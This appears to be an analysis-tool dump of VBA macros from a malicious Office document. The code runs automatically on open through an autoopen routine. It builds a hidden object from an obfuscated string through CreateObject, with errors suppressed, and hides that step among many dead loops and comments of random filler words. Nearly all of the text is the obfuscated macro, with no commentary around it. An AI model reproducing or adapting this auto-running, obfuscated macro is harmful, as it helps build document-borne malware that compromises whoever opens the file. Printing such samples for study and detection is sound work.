Kids__Toyswjj = Azerbaijanian_Manatsjt + CInt(110) 'Maine payment Norfolk Island Sports Afghanistan convergence Tennessee streamline Jersey interface silver Fantastic Soft Keyboard COM Unbranded Concrete Ball
'Customer PNG Investment Account Streamlined Austria port Sleek Plastic Bacon District AI index seize Money Market Account generate
Sleek_Plastic_Shirtozp = Azerbaijanian_Manatsjt + Len("264") 'Soft calculate hack Ways Orchestrator partnerships cyan GB regional white bypassing Home Loan Account Beauty, Beauty & Electronics
'Avon migration feed compress Sleek Home, Sports & Home Electronics, Outdoors & Beauty yellow bypassing
compressinghzp = Azerbaijanian_Manatsjt + CInt(43) 'Norway Ergonomic Wooden Soap Investor Licensed Berkshire Practical Bedfordshire Fresh orange
'grey Indiana distributed multi-state Personal Loan Account Coordinator contingency Small Credit Card Account Sleek Lake online
Marketsbij = Azerbaijanian_Manatsjt + Len("657") 'cutting-edge Product Russian Ruble e-services Global Corporate Soft multi-byte global Executive primary
'Refined Cotton Table Mississippi synthesize application Arizona Applications invoice Usability
whitezfz = Azerbaijanian_Manatsjt + Len("23") 'Radial Buckinghamshire synergy Configuration connecting Incredible Cotton Chicken Algerian Dinar Argentine Peso
'Response Frozen Idaho back-end Checking Account copying Regional value-added Burundi Money Market Account
generatejwh = Azerbaijanian_Manatsjt + CStr(Graniteuwk) 'Minnesota Buckinghamshire Savings Account Iceland user-centric repurpose calculate Technician quantifying
'Concrete Officer success Kids & Shoes Administrator Awesome Rubber Pants
Wend
'Berkshire redundant encoding Riel 1080p Belize Dollar Indiana bandwidth Refined Steel Shirt niches Generic Metal Computer Auto Loan Account
End Function"
File "functionalitiestfi.bas" (Streampath: "Macros/VBA/functionalitiestfi") has code: "Function upwardtrendingjtc()
On Error Resume Next
'/fuchsiapnt
'withdrawal Trail Borders Finland Indiana Sports & Books calculating system Human Mali Gibraltar
Azerbaijanian_Manatsjt = "Plastic Kids & Music US Dollar Avon Incredible Granite Chair multi-byte"
'/Directorsrv
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Republic of Korea turn-key Functionality bricks-and-clicks ADP Checking Account
granularkvd = Azerbaijanian_Manatsjt + CInt(683) 'Grocery & Music back-end override Connecticut Comoro Franc Port Licensed Frozen Hat next generation Money Market Account streamline cyan
'applications Engineer Cape Verde Buckinghamshire scalable Personal Loan Account Greece modular Jewelery & Automotive Gorgeous Concrete Towels copy
Fullyconfigurableuzd = Azerbaijanian_Manatsjt + Len("658") 'Unbranded Cotton Chicken Outdoors & Automotive circuit black Home Loan Account Chief
'task-force red Grocery, Industrial & Home Specialist secured line Generic supply-chains Tasty Rubber Ball deposit 5th generation Pine strategize
Comoroslmz = Azerbaijanian_Manatsjt + CInt(777) 'input Visionary Frozen frame copy tan portals Kids Generic
'productivity connect Louisiana Home Loan Account programming Group proactive
Brandfdh = Azerbaijanian_Manatsjt + Len("296") 'Nebraska Automated open architecture Plastic Handmade Fresh Cheese Refined application violet Venezuela Generic Steel Gloves Kina Berkshire Lights solid state
'ADP IB back up groupware Vanuatu driver
onetooneihp = Azerbaijanian_Manatsjt + Len("922") 'Shoals regional impactful firewall Regional Agent West Virginia cross-platform ivory Investor Principal Dynamic
'Architect capability Ergonomic Cotton Computer Principal Palladium repurpose Generic Metal Ball Grocery & Automotive secured line payment Robust Ergonomic Wooden Tuna generating
Algerian_Dinarqmh = Azerbaijanian_Manatsjt + CStr(invoicedwf) 'optical Borders extend Accountability Planner fresh-thinking info-mediaries Euro Dynamic Division Assimilated Practical Granite Hat SMTP Licensed Fresh Car
'Soft Dynamic Ergonomic Fresh Bike Mauritius Assurance Indiana policy Licensed turquoise Iraqi Dinar unleash Kwanza
Wend
'Fresh Product overriding microchip intranet Missouri Soft
'/bypassingspp
'monitor Dynamic Practical Dynamic Decentralized Fords Islands unleash orchestrate Botswana Associate end-to-end
Azerbaijanian_Manatsjt = "application Industrial & Shoes Awesome Metal Shirt capacitor Rue deposit Fresh Run Norwegian Krone Inlet connecting Practical Frozen Chips calculating"
'/fullrangernv
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'bandwidth National Mountains Networked Strategist Hawaii
Handcraftedajv = Azerbaijanian_Manatsjt + CInt(663) 'Investment Account model Bedfordshire Executive Passage Connecticut Handcrafted Granite Table Shoals River Arizona Senegal cross-platform
'multi-byte deposit synthesize Fantastic Metal Shirt Open-source Assurance Computers, Sports & Music digital mobile solid state Integrated quantifying
empowerljo = Azerbaijanian_Manatsjt + Len("626") 'Unions South Georgia and the South Sandwich Islands Granite technologies next-generation SDD
'reboot Intelligent Steel Bacon International neural Solomon Islands Dollar Industrial Terrace
Centralwzu = Azerbaijanian_Manatsjt + CInt(496) 'tan contingency panel Buckinghamshire Turkish Lira Polarised synergy Clothing metrics generating navigating Bulgaria synthesizing
'Sharable mobile Sierra Leone Crescent front-end backing up wireless Berkshire
Intelligentbcd = Azerbaijanian_Manatsjt + Len("400") 'Movies, Beauty & Outdoors Sri Lanka Rupee portal Soft encompassing Licensed Refined end-to-end
'Human calculating 1080p wireless invoice streamline Rustic Granite Table backing up plug-and-play Guadeloupe Denmark integrate impactful
Credit_Card_Accountowf = Azerbaijanian_Manatsjt + Len("97") 'reciprocal microchip Berkshire Mississippi Tasty Plastic Cheese Small navigating streamline Cove quantifying
'Associate Massachusetts hard drive engage enterprise methodologies metrics Concrete Row Burg
Woodenpdp = Azerbaijanian_Manatsjt + CStr(Home_Loan_Accountnfr) 'systematic generate connecting Belarus copying Falls
'Communications wireless Checking Account UAE Dirham Awesome Home Loan Account
Wend
'evolve Villages circuit Trace South Dakota embrace zero tolerance Georgia Incredible Soft Chair concept Licensed Steel Table Mountain Automotive & Baby Ergonomic
Set upwardtrendingjtc = CreateObject(Unionclc + Health__Toysfwz(virtualjnt.Estateaah + valueaddedhos))
'/Smalllal
'ivory Intranet wireless HDD deposit Public-key e-commerce Lithuania Consultant quantifying mint green Licensed Fresh Pizza Viaduct
Azerbaijanian_Manatsjt = "parsing SMS Lead neural high-level Bangladesh Metal Virginia Isle Books
Beauty & Kids"
'/transmitteroaz
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Refined Rubber Chair Games, Baby & Automotive Unbranded feed incremental cross-platform wireless hybrid real-time Lesotho
hackingnaw = Azerbaijanian_Manatsjt + CInt(271) 'Savings Account tan quantifying National visualize FTP Consultant Wooden
'quantify Industrial quantifying Awesome Metal Keyboard end-to-end Frozen Ergonomic Maryland Walk Ergonomic Cotton Chair e-services Ports Berkshire Games & Clothing
convergencecom = Azerbaijanian_Manatsjt + Len("153") 'invoice interface connect Frozen tan Arkansas real-time open-source Knoll British Indian Ocean Territory (Chagos Archipelago) Investment Account Divide
'Montana Fantastic Wooden Bike Soft Cotton Fully-configurable back up Checking Account overriding
Dynamicbmm = Azerbaijanian_Manatsjt + CInt(474) 'Chief Berkshire Licensed AGP Communications Music mint green
'Tasty Concrete Shirt transmitter Identity parse EXE Berkshire
paymentvzs = Azerbaijanian_Manatsjt + Len("67") 'Spurs Glen incubate Credit Card Account violet Operative FTP
'Saint Barthelemy Incredible Rustic Rubber Chair visualize Practical Infrastructure Jordanian Dinar
Genericivj = Azerbaijanian_Manatsjt + Len("599") 'Focused extend South Africa Shoal pixel Minnesota transmit Intelligent Frozen Tuna backing up
'COM Island navigating mindshare lavender Checking Account Assistant User-centric Ergonomic Soft Chicken Incredible Rubber Table Drive intermediate Tunisia
Handcrafted_Concrete_Chairzdj = Azerbaijanian_Manatsjt + CStr(implementkil) 'Bedfordshire Qatari Rial Norfolk Island backing up Security applications Pennsylvania Architect Walk
'Fields Sports, Games & Outdoors Wyoming Baby, Games & Outdoors Extended Bedfordshire harness knowledge base Rustic Metal encoding transmit Avon Dalasi
Wend
'Paradigm HDD Martinique parse invoice Focused Designer
'/streamlineili
'Money Market Account neutral Rustic deposit Fresh bandwidth HDD hack Palestinian Territory Configuration Chief e-business
Azerbaijanian_Manatsjt = "neural Kentucky AGP Internal application withdrawal Rhode Island Kids & Automotive silver navigating Costa Rican Colon tan intranet leading-edge"
'/Spurssrz
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Credit Card Account PCI Product Louisiana Refined Frozen Salad transform Product Shores withdrawal Vision-oriented system Fantastic Wooden Shirt Cotton
JBODpzv = Azerbaijanian_Manatsjt + CInt(41) 'Identity Borders Tasty Rubber Mouse USB Jewelery clicks-and-mortar Lead Forks Chief Utah Agent Personal Loan Account Bedfordshire Cameroon
'teal reboot Lane matrix Dynamic e-business Identity Integration
hackkkm = Azerbaijanian_Manatsjt + Len("716") 'technologies Cotton Connecticut Multi-channelled convergence Romania Azerbaijan Fresh distributed bypassing Tools & Health mission-critical 24/7
'Norfolk Island Communications Markets Aruba Rustic Rubber Car Specialist Avon Lead Trace Lebanon Louisiana Timor-Leste Versatile Movies & Automotive
Savings_Accountkid = Azerbaijanian_Manatsjt + CInt(397) 'parse Mobility Vermont back-end California program Consultant Handcrafted Response Freeway Sleek Metal Chair
'Rubber Small Awesome Steel Hat Generic Plastic Chair scale Alabama orange magnetic card enterprise haptic Movies, Jewelery & Jewelery database Investor
USBwdb = Azerbaijanian_Manatsjt + Len("94") 'Assistant matrix Associate Decentralized interactive Incredible Concrete Cheese Arizona GB
'directional open-source 24/7 Home Loan Account implementation Synchronised Consultant Creek Hawaii
programazk = Azerbaijanian_Manatsjt + Len("448") 'Berkshire 24/365 Chad Shoes Sharable Analyst reboot Tasty Metal Bacon
'connect Ghana Shores reboot Macedonia strategy Intelligent
ivoryzwc = Azerbaijanian_Manatsjt + CStr(impactfulrft) 'engage Slovakia (Slovak Republic) PNG Savings Account Sleek Cotton Fish holistic Cambridgeshire 1080p
'virtual 1080p Solutions THX compress Saint Helena Hills application Wooden action-items Fresh sky blue web-readiness Legacy
Wend
'users interfaces firewall Licensed e-commerce Home Loan Account Future
upwardtrendingjtc.ShowWindow = wdTextureNone
'/Small_Metal_Hatahl
'Clothing & Home Industrial Texas internet solution Prairie Direct disintermediate Research Intelligent Frozen Bacon Program Functionality Coordinator Borders
Azerbaijanian_Manatsjt = "ADP SCSI synthesizing Steel 1080p JSON Steel"
'/zero_defectilv
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'systemic Handcrafted Wooden Gloves Yen back up Awesome Soft Ball Licensed Garden calculate Movies, Home & Health azure Graphic Interface proactive circuit bypass
Mandatoryjnk = Azerbaijanian_Manatsjt + CInt(607) 'Plastic clear-thinking indexing invoice compressing Automotive, Books & Shoes Kwacha dynamic Business-focused
'Fantastic deposit bypass repurpose Assistant XML Clothing, Automotive & Electronics Directives recontextualize
Cottonnda = Azerbaijanian_Manatsjt + Len("954") 'Advanced Island Baby Investment Account syndicate American Samoa Toys, Books & Movies empower Refined Creek
'synergy analyzer navigate architect SDD PCI Seamless transmit
Crossgroupidc = Azerbaijanian_Manatsjt + CInt(311) 'protocol Berkshire recontextualize Developer card cyan bypass Regional Kansas Ergonomic Frozen Soap RAM Baby Marketing Islands
'Focused New Hampshire Books & Shoes plug-and-play Money Market Account Drives Berkshire digital Buckinghamshire Legacy
Rupiahcat = Azerbaijanian_Manatsjt + Len("426") 'invoice Concrete magnetic Incredible Sleek Wooden Chips Intranet sky blue TCP Mexico panel empower web services Syrian Arab Republic synthesizing
'Turkish Lira Berkshire Auto Loan Account Square Planner invoice SDD Sleek Concrete Salad Extended grid-enabled empowering
Incredible_Concrete_Chipslbj = Azerbaijanian_Manatsjt + Len("964") 'Grocery & Jewelery redundant Dynamic Bedfordshire copying Berkshire Architect Ergonomic Steel Sausages Legacy directional Frozen
'pixel payment Bedfordshire Burundi Avon extensible Orchestrator withdrawal Borders solution-oriented Consultant Legacy mint green
hackingtto = Azerbaijanian_Manatsjt + CStr(worldclassbhi) 'e-services Glen Decentralized CFA Franc BEAC withdrawal Washington quantify cross-platform Facilitator Cotton Cotton grid-enabled
'multi-state Automotive Quality PCI service-desk lime fuchsia Tasty Wooden Sausages e-enable Texas deposit Auto Loan Account Generic Soft Car Associate
Wend
'Supervisor Coves matrix Kina Malaysian Ringgit Buckinghamshire Credit Card Account auxiliary Optimization Outdoors & Toys New Taiwan Dollar morph circuit
'/bypassingtuh
'Money Market Account Ford RAM panel 5th generation Florida Re-contextualized silver
Azerbaijanian_Manatsjt = "e-enable methodologies Supervisor withdrawal Sleek Practical Plastic Cheese bypass Home Loan Account Industrial & Computers Central Dynamic circuit"
'/Virtualfot
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Creative client-server bricks-and-clicks Manors SQL plum Harbors Fantastic Frozen Ball connecting hierarchy Paraguay application Liaison
Opensourceatz = Azerbaijanian_Manatsjt + CInt(952) 'Agent Incredible process improvement end-to-end silver Awesome global Fundamental Graphical User Interface quantifying
'Sleek Granite Tuna open-source Investment Account leverage Parkways port Venezuela Triple-buffered
navigatingadr = Azerbaijanian_Manatsjt + Len("532") 'protocol Agent silver black Small Concrete Mouse envisioneer National
'Practical content Avon Refined Frozen Soap Lithuania backing up compress Cotton Steel deposit back-end architectures
Booksmod = Azerbaijanian_Manatsjt + CInt(585) 'Generic asynchronous purple withdrawal green Rhode Island ROI deposit Infrastructure Buckinghamshire Coves well-modulated Tasty cyan
'invoice Refined Industrial, Toys & Toys navigating exploit networks Saudi Riyal clicks-and-mortar PCI Congo
Woodenjph = Azerbaijanian_Manatsjt + Len("690") 'back up bandwidth Tactics access User-friendly input throughput Surinam Dollar Glen Rubber Rustic Fresh Toys optimal
'Tactics British Indian Ocean Territory (Chagos Archipelago) card compressing backing up Extended hacking markets
Irelandkzj = Azerbaijanian_Manatsjt + Len("209") 'payment parse Overpass Forks Security Personal Loan Account Direct invoice Home Money Market Account Home Loan Account
'Auto Loan Account Plaza tangible data-warehouse Developer navigate transmit budgetary management scale
Valleyibm = Azerbaijanian_Manatsjt + CStr(Heard_Island_and_McDonald_Islandswtz) 'Distributed Credit Card Account AI array Forges Texas
'transmit Music, Music & Games Paradigm benchmark quantifying Cross-platform circuit Producer Frozen TCP Villages Metrics Unbranded Frozen Table Handcrafted Wooden Sausages
Wend
'Director bluetooth Tasty Cotton Table COM auxiliary withdrawal Architect Borders experiences Legacy Alabama purple Small
End Function
Function Health__Toysfwz(Harborhtw)
On Error Resume Next
'/Incredible_Concrete_Chairkfj
'experiences Connecticut Gambia Fantastic Wooden Gloves Connecticut Berkshire Refined Wooden Salad integrated
Azerbaijanian_Manatsjt = "Central Designer coherent Jewelery online Grocery
Movies & Automotive"
'/Baby__Beautynts
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Beauty, Garden & Music Hollow Tasty Plastic Shoes Place Uzbekistan Sum project array Metrics Garden, Home & Automotive Money Market Account
clientdrivenpbi = Azerbaijanian_Manatsjt + CInt(802) 'connecting Business-focused communities indexing implement withdrawal Fresh Ways hard drive Common Implementation
'Phased attitude Solutions overriding Intelligent Frozen Chair Graphical User Interface Fantastic Steel Pants copying Forward invoice
Berkshirebnm = Azerbaijanian_Manatsjt + Len("47") 'back-end applications Road back-end reintermediate middleware compress software deposit Applications partnerships
'Chile National Denmark Organic grid-enabled Operations productivity Wall Money Market Account ADP payment Cotton
Motorwayubw = Azerbaijanian_Manatsjt + CInt(579) 'Auto Loan Account Small application hacking innovate deposit Functionality
'blue scalable exploit deposit Analyst Programmable Myanmar Walks Trace Sleek Metal Fish Gorgeous Fresh Hat Springs
missioncriticalcuw = Azerbaijanian_Manatsjt + Len("937") 'Generic Wooden Pants Fantastic Wooden Cheese Fresh dedicated index multi-byte bypass Enterprise-wide Key reciprocal violet Mississippi Program
'Facilitator tertiary Fantastic Cotton Salad Savings Account Stravenue generating Station card Customer
Drivesail = Azerbaijanian_Manatsjt + Len("271") 'Buckinghamshire executive indigo forecast plum quantifying bypassing AI
'Facilitator magnetic cyan Corner input Ohio grey program
Dynamicmmz = Azerbaijanian_Manatsjt + CStr(enterprisewsi) 'Maine Hawaii Personal Loan Account port Small Metal Chair productivity Producer microchip transmitting
'Applications engage e-business Knolls Pre-emptive Licensed Fresh Soap Granite North Dakota bypass Ergonomic Cotton Mouse violet mobile
Wend
'program Strategist Utah archive Representative ADP extranet
'/salmonfzv
'Practical Fresh Salad Metal payment Small Cotton Fish Tala Intelligent metrics maximize Investment Account
Azerbaijanian_Manatsjt = "deposit 24/7 access Borders cross-platform program Home
Home & Garden Incredible multi-tasking Customer"
'/Humanzon
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'digital methodologies generate Associate Saudi Riyal Tunisian Dinar
systemrzh = Azerbaijanian_Manatsjt + CInt(782) 'Kina Practical deposit Indiana Tasty transmitting Unbranded Wooden Towels encoding repurpose pixel
'Stream TCP Taka open-source Rustic innovative Credit Card Account Profound deposit
Handcrafted_Rubber_Soapzru = Azerbaijanian_Manatsjt + Len("958") 'Metal Cambridgeshire efficient transmitting technologies index holistic Ergonomic Wooden Ball North Carolina
'interactive Squares SMTP Arizona implementation world-class deposit Common Generic Bedfordshire gold withdrawal Norway
Synchronisedkbz = Azerbaijanian_Manatsjt + CInt(141) 'copying Sleek Cambridgeshire Small quantifying magenta Branding Toys, Automotive & Movies Handmade Fantastic Frozen Chair South Carolina Monitored
'Slovenia Gorgeous Synchronised lavender parse architectures Money Market Account Interactions bandwidth compressing
Securedlfo = Azerbaijanian_Manatsjt + Len("747") 'ROI card Union Rand Granite Corporate COM transparent Cotton transmitter transmitting mobile payment Fresh
'paradigms Personal Loan Account Representative Movies program circuit fuchsia application neutral Tasty Wooden Bacon Representative Kids & Health calculate
Checking_Accountaoj = Azerbaijanian_Manatsjt + Len("253") 'Forward connecting Refined Steel Mouse Global Handmade Plastic Soap e-commerce Personal Loan Account Timor-Leste applications Refined Plastic Ball
'invoice Optimization Square budgetary management Operations monitoring index
Regionaldjm = Azerbaijanian_Manatsjt + CStr(Garden__Electronicsoim) 'Ergonomic Soft Hat Group Berkshire Hungary bluetooth Agent Balanced driver responsive Balanced Intuitive
'Gorgeous Estates invoice utilisation blue copying Sleek Fresh Pizza open-source Orchard Hryvnia navigating
Wend
'Human virtual redefine Tasty Fresh Shirt Prairie Engineer alarm Refined metrics Unbranded Frozen Bike
copyhsl = Harborhtw
'/ebusinesscow
'Cotton Kids, Clothing & Clothing heuristic Shoes Small Fords Internal Buckinghamshire Intelligent Fresh Hat Sierra Leone Summit experiences redefine COM
Azerbaijanian_Manatsjt = "Tasty Frozen Mouse orchestrate deposit lavender Strategist Arkansas Devolved Implementation Heights Unbranded Granite Shoes Station Synergistic"
'/wa247nco
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'indexing withdrawal EXE quantifying next generation Bedfordshire Books, Automotive & Beauty El Salvador
Unionvoh = Azerbaijanian_Manatsjt + CInt(426) 'maximize Vision-oriented Sleek Rubber Shirt global Buckinghamshire Washington cross-platform Guyana Dollar Bahamian Dollar Kids Future panel encryption
'HDD Interactions Texas methodical Berkshire virtual Rubber indigo
Glenswqr = Azerbaijanian_Manatsjt + Len("563") 'Interactions aggregate Georgia Auto Loan Account communities Small Plastic Cheese Islands Compatible
'networks Sudan Beauty program programming optical withdrawal Plastic synthesizing
Parkjim = Azerbaijanian_Manatsjt + CInt(681) 'Soft Wyoming Granite open architecture Exclusive driver paradigms Intelligent Cotton Ball Unbranded monitoring primary
'reboot Islands Nepal Multi-channelled Home Loan Account Plastic transmitting action-items Jordanian Dinar initiative Buckinghamshire Buckinghamshire indexing Electronics, Automotive & Health
Tastyapv = Azerbaijanian_Manatsjt + Len("784") 'Way Fields cyan Directives Checking Account groupware programming card Texas override Regional
'model Administrator connecting Garden & Computers Bermudian Dollar (customarily known as Bermuda Dollar) Forint e-markets violet override withdrawal maroon invoice Wooden
quantifyingtuw = Azerbaijanian_Manatsjt + Len("847") 'Avenue deliverables Cliffs New Taiwan Dollar Right-sized Fantastic Wooden Chair deposit monitor Implemented Usability
'withdrawal Rapids Uganda Shilling Passage auxiliary e-business Fantastic Fresh Sausages Borders payment strategize harness Handcrafted Soft Keyboard
paymentrjm = Azerbaijanian_Manatsjt + CStr(optimizejbb) 'invoice Row tan leading-edge ubiquitous exploit world-class Supervisor Engineer
'compressing Licensed Concrete Tuna array Fords Direct Checking Account Automotive ADP Solomon Islands Dollar deposit pixel Falls
Wend
'open-source Kuwaiti Dinar viral neural Cambridgeshire SMTP Solutions
indigoqss = "61"
'/Home_Loan_Accountpnn
'programming Intelligent Extended next-generation Handmade Wooden Soap leading edge orange Extension
Azerbaijanian_Manatsjt = "withdrawal Direct SAS Oregon overriding French Southern Territories Intelligent Granite Chicken"
'/bandwidthmonitoredvfb
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'synthesizing Customer envisioneer parsing Tasty Plastic Cheese Gorgeous Savings Account
scalepuw = Azerbaijanian_Manatsjt + CInt(911) 'North Dakota Movies & Clothing Kids Berkshire Plastic synthesize Direct Road Isle Internal distributed Representative Central
'bluetooth Passage process improvement leverage Orchestrator Metal
programmingzjo = Azerbaijanian_Manatsjt + Len("537") 'Viaduct SCSI Guarani solutions Port Borders gold invoice European Unit of Account 17(E.U.A.-17) Soft
'Refined optical connecting Strategist paradigm Frozen Road parse Applications FTP
Directzzp = Azerbaijanian_Manatsjt + CInt(954) 'North Carolina Games Fantastic Avon Missouri Sleek extensible hack Small Wooden Tuna methodologies firewall Ukraine Avon
'European Unit of Account 17(E.U.A.-17) Automated digital Stream Credit Card Account override Thailand
primaryzlc = Azerbaijanian_Manatsjt + Len("272") 'override Computers & Movies Outdoors, Grocery & Clothing deposit withdrawal Credit Card Account Fresh Lights Money Market Account Handcrafted Wooden Keyboard Global enhance
'Liaison Cuba Lithuania Handcrafted Cotton Chair backing up copy Ergonomic Soft Hat
copyumz = Azerbaijanian_Manatsjt + Len("594") 'Strategist Money Market Account Practical Frozen Consultant Unbranded Incredible Cook Islands firewall Investment Account
'back-end Investment Account Berkshire Place Portugal Arkansas disintermediate Hungary River Ergonomic Awesome Eritrea Meadow
Auto_Loan_Accountiok = Azerbaijanian_Manatsjt + CStr(connectovh) 'Operations Mayotte Ports Hill circuit reinvent wireless connecting
'Garden Ameliorated Oklahoma back-end Brook relationships
Wend
'architect Islands parsing Centers Tasty Fresh
Health__Toysfwz = Replace(copyhsl, indigoqss, "") 'Checking Account payment Practical Fresh Shirt Optional Concrete Awesome Frozen Bike Jordanian Dinar
'/Knollsdnt
'Planner Universal Analyst zero tolerance transparent Secured supply-chains Incredible Cotton Shoes Intelligent Steel Mouse Steel protocol Incredible global
Azerbaijanian_Manatsjt = "Intelligent Plastic Chicken Designer payment Rustic vertical Ergonomic Concrete Table Metal Handmade turquoise"
'/Small_Frozen_Towelsrka
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'sky blue impactful Extensions Dam functionalities deposit parse Roads Netherlands payment
feedzjj = Azerbaijanian_Manatsjt + CInt(932) 'e-business backing up Steel programming Kip methodical
'Generic Refined Cotton Mouse Sleek Frozen system redefine complexity Administrator Granite Sleek Steel Ball Dalasi withdrawal synergistic
transitionalvak = Azerbaijanian_Manatsjt + Len("923") 'Cambridgeshire deposit Automotive Hills real-time Awesome Granite Keyboard systems Soft invoice eco-centric haptic Orchard hack Sleek
'deposit content 1080p utilisation Concrete paradigms
systemjbs = Azerbaijanian_Manatsjt + CInt(932) 'solid state Chief Delaware model North Dakota Uganda Shilling
'orchid connecting Plaza turquoise Sharable HTTP Small Plastic Soap strategic Investment Account
Generic_Metal_Cheesecuq = Azerbaijanian_Manatsjt + Len("913") 'Bedfordshire Trinidad and Tobago Credit Card Account Orchestrator online Supervisor interfaces client-server Legacy Missouri
'Unbranded Soft Chips Jewelery, Beauty & Jewelery Cedi streamline focus group Executive Interactions bluetooth Prairie optical THX Springs
greydfh = Azerbaijanian_Manatsjt + Len("36") 'Handcrafted Rubber Soap Plastic Keys Utah optical Buckinghamshire Wooden Village Concrete asymmetric Facilitator
'bus Bedfordshire Games Distributed alarm Developer reboot Accounts Orchard
Kentuckywsh = Azerbaijanian_Manatsjt + CStr(exploithil) 'Ergonomic Marketing generate Savings Account Global interactive
'Handmade circuit system-worthy dynamic models Port
Wend
'microchip Granite backing up Practical Metal Hat Legacy synthesize Sudanese Pound
End Function
Sub autoopen()
On Error Resume Next
'/Garden_Movies__Movieszin
'e-business Realigned compressing Illinois Facilitator Taka Fall Plastic French Southern Territories interfaces platforms
Azerbaijanian_Manatsjt = "functionalities visionary haptic parsing Granite Generic Frozen Hat Sweden online"
'/Intelligent_Cotton_Computerjzz
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'invoice Virgin Islands, British artificial intelligence Tools & Toys Multi-layered budgetary management
scalepbh = Azerbaijanian_Manatsjt + CInt(141) 'database Bedfordshire productize Avenue synergies hack Forward Pre-emptive quantifying Ukraine
'Operations Investment Account Flat compressing Gorgeous Metal Tuna 24/7 paradigm Health backing up Investment Account Bedfordshire Intelligent Concrete Ball
dynamicipj = Azerbaijanian_Manatsjt + Len("137") 'synthesize Wisconsin aggregate bluetooth Handcrafted Wooden Computer Refined Wooden Gloves Fresh Central Montenegro Savings Account
'invoice analyzer Intelligent Cotton Chair Checking Account incubate Handcrafted Fresh Bacon Benin Analyst parallelism
Dominicaqcq = Azerbaijanian_Manatsjt + CInt(320) 'synthesizing mission-critical Gorgeous object-oriented override Fantastic hierarchy Legacy
'Cambridgeshire bandwidth-monitored Avon Borders Practical Steel Computer Administrator Savings Account Chief Sleek Soft Chips
connectingksr = Azerbaijanian_Manatsjt + Len("542") 'Wooden reboot Digitized Buckinghamshire deploy PNG Savings Account Devolved Public-key radical Computers & Electronics
'navigate West Virginia Island synergize Analyst US Dollar engage Product Fantastic Steel Towels mint green online
Villageqsv = Azerbaijanian_Manatsjt + Len("796") 'USB Jamaican Dollar Virtual Optimization COM Unbranded Rubber Towels ability
'Sleek Soft Computer infrastructures bluetooth parse New Leu Oklahoma Planner Arkansas Handmade Metal Chips Small Rubber Bike Self-enabling Branch Denar Ergonomic Granite Fish
Malagasy_Ariarypts = Azerbaijanian_Manatsjt + CStr(withdrawalwlm) 'visualize Handmade Frozen Car Money Market Account demand-driven Directives Park real-time Borders robust product Cook Islands Principal
'Reverse-engineered client-driven Investment Account white fuchsia Jewelery Investment Account Legacy definition Intelligent Fresh Tuna Steel Shoal
Wend
'Lights Savings Account IB Creative JBOD Metal Cambridgeshire viral Borders Licensed Metal Chicken integrate
'/Anguillafzu
'Upgradable synthesizing scalable Rustic Wooden Fish transmit Ridges Sleek Fresh Cheese United Kingdom Credit Card Account bypass XML Generic Fresh Chicken
Azerbaijanian_Manatsjt = "Movies
Toys & Automotive Solutions Sleek Soft Bacon Analyst override San Marino cross-platform European Unit of Account 9(E.U.A.-9)"
'/Estoniasbw
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Directives Knolls Delaware circuit mobile Illinois Buckinghamshire Handmade Steel Cheese Multi-layered Guinea Franc bypass deposit Tools, Shoes & Garden
moderatorjci = Azerbaijanian_Manatsjt + CInt(220) 'Distributed bypass New Mexico Fantastic Soft Ball multi-tasking virtual
'driver Rustic input Electronics orchid e-services navigate Licensed Granite Car
Bedfordshirekuj = Azerbaijanian_Manatsjt + Len("617") 'Haven Handcrafted Rubber Shoes Refined Cotton Table violet Personal Loan Account solid state
'Unbranded Soft Soap Director Tasty Rubber Table Gorgeous Cotton Chair Investment Account quantify silver withdrawal Borders
lavenderbqa = Azerbaijanian_Manatsjt + CInt(481) 'Personal Loan Account payment Books, Health & Beauty overriding Ameliorated Direct directional
'Rustic Incredible Fresh Table engineer calculate Sports, Computers & Sports Creek Associate
indigodvz = Azerbaijanian_Manatsjt + Len("685") 'withdrawal Assistant Ridges quantify index applications Cambridgeshire Metical orange enterprise Bedfordshire Integration
'Frozen Rwanda Franc Islands reboot Program Walks Plastic pixel Fresh Knolls transparent
whiteboardtrt = Azerbaijanian_Manatsjt + Len("685") 'South Dakota Handcrafted Metal Keyboard override Maryland innovate Cayman Islands Dollar
'Associate Administrator Home Loan Account ADP synergistic Trail Row Credit Card Account payment SQL Turnpike Togo
Pound_Sterlingohn = Azerbaijanian_Manatsjt + CStr(Portsbuz) 'alarm Soft Bedfordshire Investment Account Money Market Account Checking Account CSS neural
'Security Berkshire Right-sized Arizona Washington bus navigating Beauty Handcrafted Administrator Frozen Wooden
Wend
'Gorgeous Plastic Computer Springs Buckinghamshire Fantastic Plastic Shirt Handcrafted Brand Intelligent Rubber Shoes generate black Montana connect navigating
Surinamenjp
'/whitepbn
'back-end monetize Sleek Plastic Sausages Officer Compatible primary
Azerbaijanian_Manatsjt = "payment Lights circuit collaborative systems back-end Small California"
'/Handmadeitn
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Automotive, Kids & Toys green generate Squares Concrete enhance invoice
transmitterzwp = Azerbaijanian_Manatsjt + CInt(232) 'Rubber bypassing pricing structure Security synthesizing matrix Investment Account exuding GB Digitized Sleek Granite Tuna invoice asymmetric lime
'Baby & Jewelery Group driver Nakfa Designer North Korean Won productivity HTTP Pennsylvania end-to-end Kids & Kids Concrete disintermediate Cambridgeshire
Specialisthub = Azerbaijanian_Manatsjt + Len("283") 'RAM array next-generation Cambridgeshire invoice Wells orchid primary customized Toys Junctions
'index mint green encryption New Zealand process improvement Metal Rest Division Awesome Metal Computer
Checking_Accountizc = Azerbaijanian_Manatsjt + CInt(44) 'Buckinghamshire Industrial backing up indexing 24/7 Graphical User Interface matrix Marketing
'deposit Delaware Cross-platform Business-focused Integration disintermediate Well Bolivar Fuerte e-enable Markets Dynamic Bedfordshire deposit Operations
Home__Homeico = Azerbaijanian_Manatsjt + Len("961") 'overriding calculating Tools enable Response Baht Advanced
